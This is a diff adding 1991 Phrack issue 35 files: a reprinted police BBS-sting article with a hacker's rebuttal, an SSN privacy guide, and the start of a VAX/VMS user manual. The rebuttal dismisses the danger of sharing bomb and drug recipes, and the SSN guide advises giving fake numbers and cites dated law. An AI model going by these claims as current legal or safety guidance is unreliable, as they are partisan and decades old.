+      ||  / \     |        /   \                                      ||
+      || /   \____|____              E  N  _  R  _  P  M  E  N  _     ||
+      ||  Dale               ^                                        ||
+      ||  Drew               |                                        ||
+      ||              Will this be YOU?!                              ||
+      ||______________________________________________________________||
+
+
+The following is a reprint of the article "Sting Operations" from the book
+_Dedicated Computer Crime Units_ (pages 101-103) written by J. Thomas McEwen
+for the U.S. Department of Justice and published in June 1989.
+
+If you would like to get your own FREE copy of this book, or its companion
+books:
+
+- Organizing for Computer Crime Investigation and Prosecution
+- Electronic Fund Transfer and Crime
+- Electronic Fund Transfer Fraud
+
+you can contact:
+
+U.S. Department of Justice
+Office of Justice Programs
+National Institute of Justice
+Washington, D.C.  20531
+(301)251-5500
+(800)851-3420
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                        S T I N G   O P E R A T I O N S
+                        ~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~
+                        Will *YOU* Be The Next Victim?!
+
+                       Transcribed by Sovereign Immunity
+
+
+ELECTRONIC BULLETIN BOARDS
+
+An electronic bulletin board allows for the storage of information which can be
+retrieved by other systems calling into the board.  It is essentially a
+database maintained by a system that is accessible by others over telephone
+lines.  Most bulletin boards have been created for specific purposes, usually
+for the exchange of messages and information among parties with common
+interests.  For example, members of computer clubs maintain bulletin boards for
+communicating with each other between meetings.
+
+Bulletin boards are especially popular among microcomputer users.
+Establishment of a bulletin board is facilitated by programs that can be
+purchased or obtained from public domain software.  With one of these programs,
+a user can establish tailored menus for anyone dialing into the board.  These
+menus will usually contain options on information about the board, bulletins,
+news summaries, personal mail, conferences, and leaving messages.
+
+In addition, most bulletin boards have different levels of access to restrict
+users from certain parts of the board.  The bulletin board owner, usually
+called the System Operator (SYSOP), personally establishes the authorized
+access levels for each user and enters this information into the system.
+Access is determined by having a user provide their name and password when
+signing on to the system.  A telephone line into the system is the only other
+requirement for establishing a board on a microcomputer.
+
+Access to bulletin boards generally operates along the following lines:
+
+- A user dials into the bulletin board.
+- The board responds with a message asking for the person's name and password.
+- The board then provides a menu showing the options available to the user.
+- The user selects an option and starts interacting with the system.
+- During a session, a user typically may read messages, leave messages,
+  download files, upload files, or join a conference.
+- The user eventually "quits" the session and hangs up from the board.
+
+While most bulletin boards have been established for legitimate purposes, there
+are also "pirate" or "elite" boards that contain illegal information or have
+been established to advance an illegal activity.  Security on those boards is
+tightly controlled by the owners.  With these bulletin boards, users usually
+have to contact the owner directly to obtain a password for access to different
+levels of the system.  A degree of trust must therefore be established before
+the owner will allow access to the board, and the owners develop "power" over
+who can use the system.
+
+Pirate boards have been found with a variety of illegal information on them
+including the following:
+
+- Stolen credit card account numbers
+- Long distance telephone service codes
+- Telephone numbers to mainframe computers, including passwords and account
+  numbers
+- Procedures for making illegal drugs
+- Procedures for making car bombs
+- Hacking programs
+- Tips on how to break into computer systems
+- Schematics for electronic boxes (e.g., black box)
+
+These boards obviously are a threat to communities, and their existence has
+gained the attention of some police departments.
+
+
+STING OPERATIONS WITH BULLETIN BOARDS
+
+The experiences of the Maricopa County, Arizona, Sheriff's Department and the
+Fremont, California, Police Department are very instructive on how local
+departments can establish their own bulletin boards and become part of the
+network with other boards.  Members of the Maricopa County Sheriff's Department
+were the first in the country to establish such a board.  Their board resulted
+in over 50 arrests with the usual charge being telecommunications fraud.
+
+In September, 1985, the Fremont Police Department established a bulletin board
+for the primary purpose of gathering intelligence on hackers and phreakers in
+the area.  The operation was partially funded by VISA, Inc. with additional
+support from Wells Fargo Bank, Western Union, Sprint, MCI, and ITT.
+
+After establishing their bulletin board, they advertised it on other boards as
+the newest "phreak board" in the area.  Within the first four days, over 300
+calls were received on the board.  During the next three months, the board
+logged over 2,500 calls from 130 regular users.  Through the bulletin board,
+they persuaded these groups that they had stolen or hacked long-distance
+telephone service codes and credit account numbers.  They were readily accepted
+and were allowed access to pirate boards in the area.
+
+The board was operated for a total of three months.  During that period, over
+300 stolen credit card numbers and long-distance telephone service codes were
+recovered.  Passwords to many government, educational, and corporate computers
+were also discovered on other boards.
+
+The operation resulted in the apprehension of eight teenagers in the area who
+were charged with trafficking in stolen credit card accounts, trafficking in
+stolen long-distance telephone service codes, and possession of stolen
+property.  Within the next week, seven more teenagers in California and other
+states were arrested on information from this operation.
+
+It was established that this group had been illegally accessing between ten and
+fifteen businesses and institutions in California.  They were regularly
+bypassing the security of these systems with stolen phone numbers and access
+codes.  One victim company estimated that it intended to spend $10,000 to
+improve its security and data integrity procedures.  Other victimized
+businesses were proceeding along the same lines.
+
+
+CONCLUSIONS
+
+There are several reasons for conducting Sting operations of this type.  One of
+the most important is that it provides a proactive method of identifying
+hackers and phreakers in the area.  These groups are particularly hard to find
+since they operate in closed circles with personal networks developed from
+friendships.
+
+Another byproduct of these operations is the publicity surrounding the cases.
+Sting operations result in considerable amount of attention from the media.
+The publicity has the effect of closing down other pirate boards in the area.
+One of the greatest fears of these offenders in that their systems will be
+taken, and in the Fremont operation over $12,000 of computer equipment was
+seized.  The publicity associated with these seizures seems to be the primary
+reason for others to stop their pirate boards.
+
+These operations also lead to other types of offenses.  In Fremont, for
+example, drug and alcohol cases were developed as a result of the Sting
+operation.   This has been typical of these operations.
+
+The Sting operations with bulletin boards have been criticized because
+teenagers, rather than hardened criminals, are arrested.  Many hackers believe
+that they have a right to the data in other systems and that their activities
+are not illegal since the companies can afford the losses.  On the other hand,
+as one investigator observed, the hackers of today may be the sophisticated
+computer criminals of tomorrow.  It is therefore important to set a lesson
+early in their careers steering them away from these offenses.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+RESPONSE FROM A MEMBER OF THE HACKER COMMUNITY:
+
+Now lets take a look at this article and the ignorant author J. Thomas
+McEwen.
+
+     "Pirate boards have been found with a variety of illegal
+     information on them..."
+
+The author names:
+
+"Telephone numbers to mainframe computers" -- There is nothing illegal in
+having the telephone number to a mainframe computer.  It is illegal to access a
+computer without authorization.
+
+"Procedures for making illegal drugs" -- It is NOT illegal to know how to
+manufacture illegal drugs, only to actually manufacture or use them.
+
+"Procedures for making car bombs" -- It is NOT illegal to know how to
+manufacture car bombs, only to actually manufacture or use them.
+
+"Hacking programs" -- Indeed most security companies, private security
+consultants, or mainframe owners and operators use these to test their systems
+very often.  It would only be illegal to use one on a machine that you are not
+authorized to use it on.
+
+"Tips on how to break into computer systems" -- Again, it is NOT illegal to
+know how to break into a computer... although for a change, according to a
+section of the Computer Fraud & Abuse Act of 1986 (Federal Law), it would be
+illegal to traffic in passwords, codes, and theoretically any instructions that
+would be the equivalent of passwords or codes for the unauthorized entry into
+computer systems.
+
+"Schematics for electronic boxes (e.g., black box)" -- This is getting boring.
+It is NOT illegal to know how to build these devices, only the actual
+construction or use of them is illegal.
+
+
+     "These boards obviously are a threat to communities, and their
+     existence has gained the attention of some police departments."
+
+How are they obviously a threat?
+
+The author would like us to believe that if the information on how to make
+telephone devices, explosives, or narcotics is available on bulletin boards,
+this is enough to make them a threat to communities.
+
+What he ignores is that the same information can be found in public and
+university libraries, text books, and technical journals;
+
+He ignores that the mere possession of information on how a crime MIGHT be
+committed is NOT a crime; and finally,
+
+He fails to recognize any First Amendment rights whatsoever of computer
+bulletin boards to have all such information to begin with.
+
+
+     "It is therefore important to set a lesson early in the careers
+     steering them away from these offenses."
+
+Of course an arrest for some minor computer mischief is not going to be great
+resume material when these teenagers start applying for jobs, even though the
+establishment has inspired within them the socially acceptable goal of
+conforming to society's expectations.
+
+
+CONCLUSIONS
+
+The author, J. Thomas McEwen, does not know much about freedom of speech and
+for that matter, he does not know much about the law.  He does know a lot about
+how to sensationalize very benign conduct into dangerous conspiracy.  Perhaps
+he is close friends with Geraldo Rivera.
+
+Bulletin board operators and users take note of the law and your rights.  Don't
+let yourself get taken in by Sting boards or ignorant law enforcement officers
+looking for some gratification on the job since they aren't getting it at home.
+
+
+S o v e r e i g n   I m m u n i t y
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Editor's Comments by: Dispater
+
+Sting boards have been a popular topic in Phrack and Phrack World News over the
+years.  In this file, Sovereign Immunity, showed us an excerpt that discussed a
+Sting bulletin board in Fremont, California.  As it turns out, Knight Lightning
+had some material about this way back in Phrack World News Issue 3 (which
+actually appeared in Phrack Issue 4).  The article was titled "Phoenix
+Phortress Stings 7."  There have also been many other articles in Phrack World
+News about sting operations and bulletin boards.
+
+Additionally, Phrack Issues 21-23 each carried one part of Knight Lightning's
+"Vicious Circle" Trilogy.  The first two parts of which ("Shadows Of A Future
+Past" and "The Judas Contract") contained a lot of material about sting boards
+and informants.
+
+Although Phrack has not presented material concerning Sting boards in Maricopa
+County, Arizona, there was discussion about a bulletin board (The Dark Side) in
+Arizona (602) run by "The Dictator" (Dale Drew) as a sting operation revealed
+in Computer Underground Digest 3.02 and recently we heard that he was back in
+action under the name "Blind Faith."
+
+Dispater 
+_____________________________________________________________________________?_
diff --git a/phrack35/6.txt b/phrack35/6.txt
new file mode 100644
index 0000000..b48de7e
--- /dev/null
+++ b/phrack35/6.txt
@@ -0,0 +1,213 @@
+                               == Phrack Inc. ==
+
+                 Volume Three, Issue Thirty-five, File 6 of 13
+
+                *****  Social Security Numbers & Privacy  *****
+                 ***                                       ***
+                  *     b y   C h r i s   H i b b e r t     *
+                 ***                                       ***
+                *****            June 1, 1991             *****
+
+                Computer Professionals for Social Responsibility
+
+Many people are concerned about the number of organizations asking for their
+Social Security Numbers.  They worry about invasions of privacy and the
+oppressive feeling of being treated as just a number.
+
+Unfortunately, I can't offer any hope about the dehumanizing effects of
+identifying you with your numbers.  I *can* try to help you keep your Social
+Security Number from being used as a tool in the invasion of your privacy.
+
+Surprisingly, government agencies are reasonably easy to deal with; private
+organizations are much more troublesome.  Federal law restricts the agencies at
+all levels of government that can demand your number and a fairly complete
+disclosure is required even if its use is voluntary.  There are no comparable
+laws restricting the uses non-government organizations can make of it, or
+compelling them to tell you anything about their plans.  With private
+institutions, your main recourse is refusing to do business with anyone whose
+terms you don't like.
+
+*********************
+***               ***
+*** Short History ***
+***               ***
+*********************
+
+Social Security numbers were introduced by the Social Security Act of 1935.
+They were originally intended to be used only by the social security program,
+and public assurances were given at the time that use would be strictly
+limited.  In 1943 Roosevelt signed Executive Order 9397 which required federal
+agencies to use the number when creating new record-keeping systems.  In 1961
+the IRS began to use it as a taxpayer ID number.  The Privacy Act of 1974
+required authorization for government agencies to use SSNs in their data bases
+and required disclosures (detailed below) when government agencies request the
+number.  Agencies which were already using SSN as an identifier were allowed to
+continue using it.  The Tax Reform Act of 1976 gave authority to state or local
+tax, welfare, driver's license, or motor vehicle registration authorities to
+use the number in order to establish identities.  The Privacy Protection Study
+Commission of 1977 recommended that the Executive Order be repealed after some
+agencies referred to it as their authorization to use SSNs.  I don't know
+whether it was repealed, but that practice has stopped.
+
+The Privacy Act of 1974 (5 USC 552a) requires that any federal, state, or local
+government agency that requests your Social Security Number has to tell you
+three things:
+
+     1.  Whether disclosure of your Social Security Number is required or
+         optional;
+
+     2.  What law authorizes them to ask for your Social Security Number; and,
+
+     3.  How your Social Security Number will be used if you give it to them.
+
+In addition, the Act says that only Federal law can make use of the Social
+Security Number mandatory.  So anytime you're dealing with a government
+institution and you're asked for your Social Security Number, just look for the
+Privacy Act Statement.  If there isn't one, complain and don't give your
+number.  If the statement is present, read it.  If it says giving your Social
+Security Number is voluntary, you'll have to decide for yourself whether to
+fill in the number.
+
+*****************************
+***                       ***
+*** Private Organizations ***
+***                       ***
+*****************************
+
+The guidelines for dealing with non-governmental institutions are much more
+tenuous.  Most of the time private organizations that request your Social
+Security Number can get by quite well without your number, and if you can find
+the right person to negotiate with, they'll willingly admit it.  The problem is
+finding that right person.  The person behind the counter is often told no more
+than "get the customers to fill out the form completely."
+
+Most of the time, you can convince them to use some other number.  Usually the
+simplest way to refuse to give your Social Security Number is simply to leave
+the appropriate space blank.  One of the times when this isn't a strong enough
+statement of your desire to conceal your number is when dealing with
+institutions which have direct contact with your employer.  Most employers have
+no policy against revealing your Social Security Number; they apparently
+believe the omission must have been an unintentional slip.
+
+*****************************
+***                       ***
+*** Lenders and Borrowers ***
+***                       ***
+*****************************
+
+Banks and credit card issuers are required by the IRS to report the SSNs of
+account holders to whom they pay interest or when they charge interest and
+report it to the IRS.  If you don't tell them your number you will probably
+either be refused an account or be charged a penalty such as withholding of
+taxes on your interest.
+
+************************************
+***                              ***
+*** Insurers, Hospitals, Doctors ***
+***                              ***
+************************************
+
+No laws require medical service providers to use your Social Security Number as
+an ID number (except for Medicare, Medicaid, etc).  They often use it because
+it's convenient or because your employer uses it to certify employees to its
+groups health plan.  In the latter case, you have to get your employer to
+change their policies.  Often, the people who work in personnel assume that the
+employer or insurance company requires use of the SSN when that's not really
+the case.  When my current employer asked for my SSN for an insurance form, I
+asked them to try to find out if they had to use it.  After a week they
+reported that the insurance company had gone along with my request and told me
+what number to use.  Blood banks also ask for the number but are willing to do
+without if pressed on the issue.  After I asked politely and persistently, the
+blood bank I go to agreed that they didn't have any use for the number, and is
+in the process of teaching their receptionists not to request the number.
+
+************************************************************
+***                                                      ***
+*** Why Is The Use of Social Security Numbers A Problem? ***
+***                                                      ***
+************************************************************
+
+The Social Security Number doesn't work well as an identifier for several
+reasons.  The first reason is that it isn't at all secure; if someone makes up
+a nine-digit number, it's quite likely that they've picked a number that is
+assigned to someone.  There are quite a few reasons why people would make up a
+number: to hide their identity or the fact that they're doing something;
+because they're not allowed to have a number of their own (illegal immigrants,
+e.g.), or to protect their privacy.  In addition, it's easy to write the number
+down wrong, which can lead to the same problems as intentionally giving a false
+number.  There are several numbers that have been used by thousands of people
+because they were on sample cards shipped in wallets by their manufacturers
+(one is included below).
+
+When more than one person uses the same number, it clouds up the records.  If
+someone intended to hide their activities, it's likely that it'll look bad on
+whichever record it shows up on.  When it happens accidently, it can be
+unexpected, embarrassing, or worse.  How do you prove that you weren't the one
+using your number when the record was made?
+
+A second problem with the use of SSNs as identifiers is that it makes it hard
+to control access to personal information.  Even assuming you want someone to
+be able to find out some things about you, there's no reason to believe that
+you want to make all records concerning yourself available.  When multiple
+record systems are all keyed by the same identifier, and all are intended to be
+easily accessible to some users, it becomes difficult to allow someone access
+to some of the information about a person while restricting them to specific
+topics.
+
+***********************************************
+***                                         ***
+*** What Can You Do To Protect Your Number? ***
+***                                         ***
+***********************************************
+
+If despite your having written "refused" in the box for Social Security Number,
+it still shows up on the forms someone sends back to you (or worse, on the ID
+card they issue), your recourse is to write letters or make phone calls.  Start
+politely, explaining your position and expecting them to understand and
+cooperate.  If that doesn't work, there are several more things to try:
+
+     1.  Talk to people higher up in the organization.  This often works simply
+         because the organization has a standard way of dealing with requests
+         not to use the SSN, and the first person you deal with just hasn't
+         been around long enough to know what it is.
+
+     2.  Enlist the aid of your employer.  You have to decide whether talking
+         to someone in personnel, and possibly trying to change corporate
+         policy is going to get back to your supervisor and affect your job.
+
+     3.  Threaten to complain to a consumer affairs bureau.  Most newspapers
+         can get a quick response.  Some cities, counties, and states also have
+         programs that might be able to help.
+
+     4.  Tell them you'll take your business elsewhere (and follow through if
+         they don't cooperate).
+
+     5.  If it's a case where you've gotten service already, but someone
+         insists that you have to provide your number in order to have a
+         continuing relationship, you can choose to ignore the request in hopes
+         that they'll forget or find another solution before you get tired of
+         the interruption.
+
+If someone absolutely insists on getting your Social Security Number, you may
+want to give a fake number.  There is no legal penalty as long as you're not
+doing it to get something from a government agency or to commit fraud.  There
+are a few good choices for "anonymous" numbers. Making one up at random is a
+bad idea, as it may coincide with someone's real number and cause them some
+amount of grief.  It's better to use a number like 078-05-1120, which was
+printed on "sample" cards inserted in thousands of new wallets sold in the 40s
+and 50s. It's been used so widely that both the IRS and SSA recognize it
+immediately as bogus, while most clerks haven't heard of it.  It's also safe to
+invent a number that has only zeros in one of the fields. The Social Security
+Administration never issues numbers with this pattern.  They also recommend
+that people showing Social Security cards in advertisements use numbers in the
+range 987-65-4320 through 987-65-4329.
+
+The Social Security Administration recommends that you request a copy of your
+file from them every few years to make sure that your records are correct.
+
+                                ***************
+                                ***         ***
+                                *** THE END ***
+                                ***         ***
+                                ***************
+_______________________________________________________________________________
diff --git a/phrack35/7.txt b/phrack35/7.txt
new file mode 100644
index 0000000..9510436
--- /dev/null
+++ b/phrack35/7.txt
@@ -0,0 +1,1312 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-five, File 7 of 13
+
+      <:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>    >>>>>=-*  Users Guide to VAX/VMS  *-=<<<<<     <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>                   Part I of III                   <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>            Part A:  Basic Information             <:=--=:>
+      <:=--=:>         Part B:  Programming the VAX/VMS          <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>                   By: Black Kat                   <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:><:=--=:><:=--=:><:=--=:>/|\<:=--=:><:=--=:><:=--=:><:=--=:>
+
+
+Index
+~~~~
+Part A contains information on the following topics:
+
+   o  Background                          o  Logical Names
+   o  Terminal Control Keys               o  System Default Logical Names
+   o  Logging in                          o  Logical Name Tables
+   o  Digital Command Language (DCL)      o  User Environment
+   o  Error Messages                      o  Terminal Characteristics
+   o  Command Line Editing                o  File Security
+   o  Files and Directories               o  EDT Text Editor
+   o  File Operations                     o  EDT Help manual
+
+Part B contains information on the following topics:
+
+   o  Programming VAX/VMS              o  Parameters
+   o  DCL Expressions                  o  Terminal I/O
+   o  Command Procedures               o  File I/O
+   o  Writing Command Procedures       o  Redirecting Command Procedure I/O
+   o  Comments                         o  Branching and Conditionals
+   o  Labels                           o  Loops
+   o  Debugging                        o  Subroutines
+   o  Invoking Command Procedures      o  Error Handling
+   o  Symbols                          o  Termination
+   o  Lexical Functions                o  Example Command Procedures
+
+
+                   <:=- Part A : Basic Information -=:>
+
+Introduction
+~~~~~~~~~~~
+VAX is an acronym for Virtual Address eXtension, a 32-bit computer developed by
+Digital in the 1970's.  The VAX architecture supports multiprogramming, where
+many users running different programs can use the VAX simultaneously and each
+appears to have full control of the computer's resources.  The multiprocessing
+VAX functions vary differently from the old timesharing systems, which would
+allocate a slice of CPU time to each user of the system in a rotating fashion,
+whether the time slice was required or not.  The VAX/VMS environment, however,
+provides each user an allocation of processor time based on the user's needs
+and priority. If a user does not need his quantum of time, or a portion of it,
+it is given to the next user.  This scheduling method is very efficient when
+compared to the old method of timesharing.
+
+The VAX is capable of addressing more than four billion addresses, through a
+method known as virtual memory addressing.  Because the memory is virtual
+however, there is no need to have four billion bytes of physical memory.  The
+VAX executes programs by a technique known as paging, whereby a single "page"
+of the program is read into memory at a time, and when a new page is needed,
+the old one is "swapped" back out to disk to make room for the new one.  The
+VMS operating system ties everything together.  The user interacts with VMS
+(Virtual Memory System) through a Command Language Interpreter (CLI), usually
+the Digital Command Language (DCL).
+
+When you use VAX/VMS, you are known to the system as a process, which is
+created when you log in to the system and deleted when you log out.  This
+process carries with it various attributes to identify you from other system
+users (process name, identification, user identification code, privileges,
+etc).
+
+
+Terminal Control Keys
+~~~~~~~~~~~~~~~~~~~
+Ctrl-A      Allows you to insert, rather than overstrike, characters on a
+            DCL command line that you're editing.
+Ctrl-B      Displays DCL commands that you've previously entered.
+Ctrl-C      Interrupts the coessed or the program being executed.
+Ctrl-E      Positions the cursor at the end of the line.
+Ctrl-H      Positions the cursor at the beginning of the line.
+Ctrl-I      Tab
+Ctrl-O      Alternately suppresses and continues the display of the output
+            terminal.
+Ctrl-Q      Enables (toggles on) output to the display after CTRL-S.
+Ctrl-R      Retypes the current input line and repositions the cursor atthe
+            end of the retyped line.
+Ctrl-S      Disables (toggles off) output to the display until CTRL-Q is
+            pressed.
+Ctrl-T      Displays process statistics.
+Ctrl-U      Discards the current input line and performs carriage return.
+Ctrl-W      Refreshes the screen.
+Ctrl-X      Flushes the type-ahead buffer.
+Ctrl-Y      Interrupts command or program execution and returns control to
+            the DCL command line interpreter.
+Ctrl-Z      Indicates end of file for data entered from terminal.
+
+
+Logging in
+~~~~~~~~
+Most VAX systems prompt you with something like this:
+
+   Welcome to VAX1
+   Username:
+
+Type your username and press <enter>.  You'll then be prompted for your
+password.  If you enter the correct username/password combination, you'll
+be given something like the following:
+
+          Welcome to VAX/VMS V4.4
+   Last interactive login on Monday, 16-JUL-87  16:12
+   Last non-interactive login on Friday, 13-JUL-87  00:14
+   $
+
+If you entered an incorrect username and password, you'll receive the
+message:
+
+   User authorization failure
+
+Just hit <enter> and you'll be prompted for your username again.  Once
+you're logged in, you'll be given the DCL prompt ($).  This indicates that
+the system is ready to accept interactive commands.
+
+To log out, use the command:
+
+   $ LOGOUT
+
+
+The Digital Command Language (DCL)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+DCL is comprised of more than 200 commands called verbs.  Each DCL verb acts on
+a parameter or assumed parameter, and the action of these verbs and the scope
+of their parameters can be modified with qualifiers.  The basic command
+structure is:
+
+$ LABEL: COMMAND-NAME PARAMETER(S) /QUALIFIER(S) !COMMENT
+    |           |         |             |           |
+    |           |         |             |           +-- Optional Comment
+    |           |         |             |
+    |           |         |             +-------------- Command modifier(s)
+    |           |         |
+    |           |         +---------------------------- Object of the
+Command
+    |           |
+    |           +-------------------------------------- DCL command verb
+    |
+    +-------------------------------------------------- Optional Label
+
+A label is an optional, user-specified string with a maximum length of
+255 characters.  It is most commonly used in command procedures.
+
+A DCL command verb defines the action the VAX will take when the command
+line is interpreted.
+
+Parameter(s) specify the object or a list of objects the DCL command verb
+will act upon.  Multiple parameters may be specified but must be separated
+from one another by a space, multiple spaces, or a tab.  If you enter a DCL
+command that requires parameters, but you don't enter them on the command
+line, the DCL interpreter will prompt you for them automatically.
+
+Qualifiers further define or modify the function the DCL command will
+perform.  They consist of a keyword followed by a value or a list of
+values.
+
+The qualifier keyword must be preceded by a slash (/).  Multiple qualifiers
+may be specified, but each must be preceded with a slash.  Qualifiers
+usually aren't required.  There are three kinds of qualifiers:  parameter,
+positional, and command.  A command qualifier applies to the whole command.
+Generally, these are placed at the end of the command.  For example:
+
+   $ DIRECTORY [BYNON],[BYNON.DECPRO]/FULL
+
+This displays a full listing of two directories, using the /FULL qualifier of
+the DIRECTORY command.  A positional qualifier takes on a different meaning
+based on where it is located in the command.  If a positional qualifier is
+placed after the command verb, but before the first parameter, the qualifier
+will affect the entire command.  If the same positional qualifier is placed
+after a parameter, only that parameter will be affected.  For example:
+
+   $ PRINT/COPIES=3 MEMO1.TXT,MEMO2.TXT
+   $ PRINT MEMO1.TXT/COPIES=2,MEMO2.TXT
+
+The first command prints three copies of each file.  The second command prints
+two copies of the first file, but only one copy of the second.  A parameter
+qualifier affects only the parameter it follows.  In the following example,
+MEMO1.TXT is sent to the queue LASER and MEMO2.TXT is sent to queue FAST_PRINT:
+
+   $ PRINT MEMO1.TXT/QUEUE=LASER,MEMO2.TXT/QUEUE=FAST_PRINT
+
+A comment is an optional, user-specified comment about the command.  It is
+commonly used in command procedures to document the command.
+
+
+Error Messages
+~~~~~~~~~~~~
+Generally, error messages are of the format:
+
+   % FACILIT-L-IDENT, TEXT
+   |   |     |   |      |
+   |   |     |   |      +-- explanation of the error message
+   |   |     |   |
+   |   |     |   +--------- abbreviated message text, for reference
+   |   |     |
+   |   |     +------------- error severity
+   |   |
+   |   +------------------- Vax/VMS facility or component (error source)
+   |
+   +----------------------- message number: "%" = first, "-" = subsequent
+
+A percent sign (%) indicates the first error message for a given command.
+All subsequent errors for that command are preceded with a hyphen (-).
+
+The facility indicates the source of the error.  The source may be the DCL
+command line interpreter, one of the various VMS utilities, or a program
+image.
+
+The severity level indicator (L) will have one of the following values:
+S (successful completion), I (information), W (warning), E (error), or
+F (fatal or severe error).
+
+The ident is an abbreviation of the error message text.  It can be referenced
+in the VAX/VMS System Messages manual.
+
+The text provides an explanation of the error message.
+
+
+Command line editing
+~~~~~~~~~~~~~~~~~~
+DCL stores the last 20 command lines entered.  You can display a list of them
+with:
+
+   $ RECALL /ALL
+
+The resulting display might look like:
+
+   1  DIR
+   2  COPY VAX1::$1$DUA5:[BYNON]LOGIN.COM LOGIN.COM;1
+   3  EDIT LOGIN.COM
+   $
+
+To recall a specific command from the recall buffer, use the DCL RECALL
+command with a command line number as a parameter.  For example:
+
+   $ RECALL 2
+   $ COPY VAX1::$1$6DUA5:[BYNON]LOGIN.COM LOGIN.COM;1
+
+
+Files and Directories
+~~~~~~~~~~~~~~~~~~~~
+Files are organized much like MS-DOS, with a directory-tree structure.  The
+user's default directory (assigned by the system administrator) is the "root"
+directory.  Up to seven subdirectories may be created, each containing as many
+subdirectories as you like.  The complete file specification looks like:
+
+   VAX1 :: DUA0 : [BYNON.PROGRAMMING.FORTRAN]WINDOWS.FOR;3
+    |       |                |                  |     |  |
+    |       |                |                  |     |  |
+   node   device         directory          filename  |  version
+                                                     type
+                                                     
+The node name identifies a computer system in a network.  If no node name is
+specified, VMS assumes the file is located on the local node where you're
+logged in.
+
+The device name is the physical device where the file is stored.  It is a
+four-character alphanumeric code which identifies the device type, hardware
+controller to which it is attached, and the unit number of the device on the
+controller.  If you omit the device name from a file specification, VMS assumes
+you are referring to your default device.
+
+The directory entry is enclosed in brackets, and is the name of the directory
+that contains the file.  If you omit the directory name from a file
+specification, VMS will assume you are referring to your default directory.
+
+The filename may consist of up to 39 alphanumeric characters.
+
+The file type is a code consisting of up to 39 alphanumeric characters, and it
+generally indicates the type of information supplied in the file.  Some system
+programs and utilities supply a three character default file type.
+
+The version number is a 1 to 5 digit number the system assigns to every file by
+default.  When a file is created, it is assigned a version number of 1.  Each
+time the file is edited or another version of it is created, the version number
+is automatically incremented by 1.  Alternatively, you may specify a version
+number of your choice.
+
+No blank spaces are allowed within any portion of a file specification.  In
+VMS Version 4.x, the maximum lengths are as follows:
+
+   node name           up to 6 characters
+   device name         four characters
+   directory name      up to 39 characters
+   subdirectory name   up to 39 characters
+   file name           up to 39 characters
+   file type           up to 39 characters
+   version number      up to 5 decimal digits with a value between 1
+                       and 32,767
+
+File specifications must be unique; no two files can have completely identical
+specifications.  It's conceivable to have many copies of NOTES.TXT in a
+subdirectory, but only one NOTES.TXT;8 may exist in the same subdirectory.
+
+Wildcards are similar to those in MS-DOS, with an asterisk (*) representing
+a filename or filetype, and a percent sign (%) indicating a single
+character.
+
+
+File operations
+~~~~~~~~~~~~~~
+Creating and modifying files:  $ CREATE TEMP.DAT
+                               TEMP 1
+                               TEMP 2
+                               <CTRL-Z>
+
+Renaming files:   $ RENAME TEMP.DAT NEW.DAT
+                  $ RENAME TEMP.DAT [BYNON.PROG]TEMP.DAT
+                  Note: you cannot rename files across devices, just
+                  directories.
+
+Copying files:    $ COPY TEMP.DAT NEW.DAT
+                  $ COPY TEMP.DAT,TEST.DAT NEW.DAT
+
+Appending files:  $ APPEND TEMP.DAT NEW.DAT
+
+Deleting files:   $ DELETE TEMP.DAT;1
+                  $ DELETE *.DAT;*
+                  $ DELETE /CONFIRM .DAT;*  (confirm each file)
+
+Displaying files: $ TYPE /PAGE TEMP.DATE    (one page at a time)
+
+Directories:      $ DIRECTORY
+                  $ DIRECTORY DJA1:[BYNON.PROG]
+
+Printing files:   $ PRINT TEMP.DAT
+
+Purging files:    $ PURGE *.DAT   (erase all but latest version of .DAT files)
+
+Create a dir:     $ CREATE/DIRECTORY [.BUDGET]
+
+Set default dir:  $ SET DEFAULT [BYNON.PROG]
+                  $ SET DEFAULT [.PROG]
+
+Delete a dir:     $ SET DEFAULT [BYNON.PROG]
+                  $ DELETE *.*;*
+                  $ SET DEFAULT [BYNON]
+                  $ SET PROTECTION=(0:D) PROG.DIR;1
+                  $ DELETE BUDGET.DIR;1
+
+
+Logical Names
+~~~~~~~~~~~~
+A logical name is a substitute for a file specification, portion of a file
+specification, or another logical name.  They provide two primary functions:
+file and device independence and file specification shorthand.
+
+File and device independence means that you are not constrained by a physical
+element, such as a disk or printer name.  If you use files nested deeply in
+subdirectories, with long names, or on devices or nodes other than your
+default, you can define a meaningful logical name to represent it.  These
+shorthand names are faster to type and easier to remember.
+
+To define a logical name:
+
+   $ DEFINE PARTS_DBF DJA2:[DATABASES]PARTS.DAT
+
+This example will associate the logical name PARTS_DBF with the file
+specification  DJA2 : [DATABASES]PARTS.DAT.  Now, PARTS_DBF may be used
+anywhere as a substitute for the complete file specification.
+
+Other commands also can be used to assign logical names.
+
+Assign  :  Associates equivalence names with a logical name
+Mount   :  Mounts a disk or tape volume and assigns a system logical for the
+           volume.
+Allocate:  Allocates a system device for private use and optionally (command
+           qualifier) assigns a logical name to the device.
+Open    :  Opens a file for read or write operations and assigns a logical
+           name to the file specification.
+
+To display the logical name translations: $ SHOW LOGICAL PARTS_DBF will
+display: "PARTS_DBF" = "DJA2:[DATABASES]PARTS.DAT"  (LNM$PROCESS_TABLE).
+
+To deassign a logical name:  $ DEASSIGN  PARTS_DBF
+
+
+System default logical names
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SYS$COMMAND   The initial file, or input stream, from which the DCL command
+              line interpreter reads input data.  The logical name
+              SYS$COMMAND is equated to your terminal for interactive
+              processes.
+SYS$DISK      Your default disk as assigned in the UAF.
+SYS$ERROR     The device on which the system displays all error and
+              informational messages.  By default, SYS$ERROR is assigned
+              to your terminal for interactive processes, and to the batch
+              job log file for any batch processes.
+SYS$INPUT     The default file or input stream from which data and commands
+              are read by either the DCL command line interpreter or
